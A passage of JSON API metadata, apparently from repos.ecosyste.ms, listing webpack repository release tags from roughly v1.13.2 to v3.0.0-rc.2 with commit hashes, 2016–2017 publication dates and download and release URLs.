yste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_